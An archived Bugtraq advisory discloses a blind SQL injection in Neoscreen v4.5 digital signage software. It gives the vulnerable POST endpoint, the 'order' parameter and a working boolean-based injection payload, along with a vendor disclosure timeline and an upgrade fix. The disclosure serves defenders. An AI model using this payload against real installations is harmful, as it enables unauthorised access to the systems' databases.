lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201607241131.u6OBVVkD009910@sf01web1.securityfocus.com>
Date: Sun, 24 Jul 2016 11:31:31 GMT
From: alex_haynes@...look.com
To: bugtraq@...urityfocus.com
Subject: Neoscreen v4.5 Blind SQL injection

Exploit Title: Neoscreen Blind SQL injection
Product: Neoscreen by Cube Digital Media
Vulnerable Versions: 4.5 and all previous versions
Tested Version: 4.5
Advisory Publication: July 24, 2016
Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [CWE-89]
CVE Reference: NONE
Credit: Alex Haynes

Advisory Details:


(1) Vendor & Product Description
--------------------------------

Vendor:
Cube Digital Media

Product & Version:
Neoscreen digital signage software v4.5

Vendor URL & Download:
http://www.cube-display.fr

Product Description:
"Neoscreen is an innovative, scalable and particularly powerful communication system. 
With just a few clicks, you can control all your dynamic display screens from your PC, wherever they may be in the world. "


(2) Vulnerability Details:
--------------------------
Several URL's in the management software are vulnerable to SQL injection attacks.

Proof of concept:

POST TO /cubelocal/modules/neoscreen/admindiff/stats_diffusion.asp?mod_stat=&machine_id=0&idpod=0 HTTP/1.1

Vulnerable parameter: order

Payload:

idpod_choisi=tous&periodeMM=1&periodeMMFin=12&periodeAA=2015&order=IIF(5968=5968,5968,1/0)&orders=0


(3) Advisory Timeline:
----------------------
25/01/2016 - First Contact: vendor responds saying they are working on fix
24/02/2016 - Follow up e-mail to request fix timeline. No vendor response.
03/03/2016 - Follow up e-mail to request fix timeline.
04/03/2016 - Vendor responds saying fix will be available 14/03/2016.


(4)Solution:
------------
Upgrade to version 5.0


(5) Credits:
------------
Discovered by Alex Haynes

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ